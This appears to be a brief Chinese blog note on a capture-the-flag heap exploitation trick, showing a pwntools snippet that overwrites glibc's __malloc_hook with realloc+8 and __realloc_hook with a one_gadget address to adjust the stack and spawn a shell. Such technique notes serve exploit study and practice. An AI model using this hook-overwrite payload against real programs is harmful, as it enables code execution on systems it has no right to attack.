realloc调整堆栈

发表于: 分类于:
字数: 63 阅读:≈ 1分钟 浏览:

  • 注意realloc_hook就在malloc_hook-8的位置
# __malloc_hook -> realloc+8
# __realloc_hook -> one_gadget
realloc = libc_base + libc.sym['realloc']
one_gadget = [0x4527a, 0xf03a4, 0xf1247]
add(4, 0x68, b'p' * 11 + p64(libc_base + one_gadget[0]) + p64(realloc + 8))